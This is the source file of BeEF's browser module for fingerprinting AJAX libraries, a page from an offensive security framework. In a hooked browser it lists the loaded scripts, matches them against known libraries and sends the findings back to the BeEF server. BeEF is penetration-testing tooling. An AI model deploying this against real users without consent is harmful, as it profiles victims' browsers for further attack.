Path: blob/master/modules/browser/hooked_origin/ajax_fingerprint/command.js
1154 views
//1// Copyright (c) 2006-2025Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {78//Regular expression to match script names in source9var regex = new RegExp('/\\w*\.(min\.)?js');10var results = [];11var urls = "";1213function unique(array) {14return $.grep(array, function(el, index) {15return index === $.inArray(el, array);16});17}1819// Fingerprints of javascript /ajax libraries . Library Name: Array of common file names2021var fingerprints = {22"Prototype":new Array("prototype"),23"script.aculous":new Array("builder","controls","dragdrop","effects","scriptaculous","slider","unittest"),24"Dojo":new Array("dojo.uncompressed","uncompressed","dojo"),25"DWR":new Array("auth","engine","util"),26"Moo.fx/":new Array("Moo","Function","Array","String","Element","Fx","Dom","Ajax","Drag","Windows","Cookie","Json","Sortable","Fxpack","Fxutils","Fxtransition","Tips","Accordion"),27"Rico": new Array("rico","ricoAjax","ricoCommon","ricoEffects","ricoBehaviours","ricoDragDrop","ricoComponents"),28"Mootools":new Array("mootools","mootools-core-1.4-full","mootools-more-1.4-full"),29"Mochikit":new Array("Mochikit"),30"Yahoo UI!": new Array("animation","autocomplete","calendar","connection","container","dom","enevet","logger","menu","slider","tabview","treeview","utilities","yahoo","yahoo-dom-event"),31"xjax":new Array("xajax","xajax_uncompressed"),32"GWT": new Array("gwt","search-results"),33"Atlas": new Array("AtlasRuntime","AtlasBindings","AtlasCompat","AtlasCompat2"),34"jquery":new Array("jquery","jquery-latest","jquery-latest","jquery-1.5"),35"ExtJS":new Array("ext-all"),36"Prettify":new Array("prettify"),37"Spry": new Array("SpryTabbedPanels","SpryDOMUtils","SpryData","SpryXML","SpryUtils","SpryURLUtils","SpryDataExtensions","SpryDataShell","SpryEffects","SpryPagedView","SpryXML"),38"Google JS Libs":new Array("xpath","urchin","ga"),39"Libxmlrequest":new Array("libxmlrequest"),40"jx":new Array ("jx","jxs"),41"bajax":new Array("bajax"),42"AJS": new Array ("AJS","AJS_fx"),43"Greybox":new Array("gb_scripts.js"),44"Qooxdoo":new Array("qx.website-devel","qooxdoo-1.6","qooxdoo-1.5.1","qxserver","q","q.domain","q.sticky","q.placeholder","shCore","shBrushScript"),4546};4748function fp() {49try{50var sc = document.scripts;51var urls ="";52var source = ""53if (sc != null){54for (sc in document.scripts){55source =document.scripts[sc]['src'] || "";56if(source !=""){57//get the script file name and remove unnecessary endings and such58var comp = source.match(regex).toString().replace(new RegExp("/|.min|.pack|.uncompressed|.js\\W","g"),"");59for (key in fingerprints){60for (name in fingerprints[key]){61// match name in the fingerprint object62if(comp==fingerprints[key][name]){63results.push("Lib:"+key+" src:"+source);64}65}66}67}68}69}70if(results.length >0){71urls=unique(results).join('||');72beef.net.send("<%= @command_url %>", <%= @command_id %>, "script_urls="+urls);73}74else{75beef.net.send("<%= @command_url %>", <%= @command_id %>, "script_urls="+urls);76}77}78catch(e){79results = "Fingerprint failed: "+e.message;80beef.net.send("<%= @command_url %>", <%= @command_id %>, "script_urls="+results.toString());81}82}8384fp();8586});878889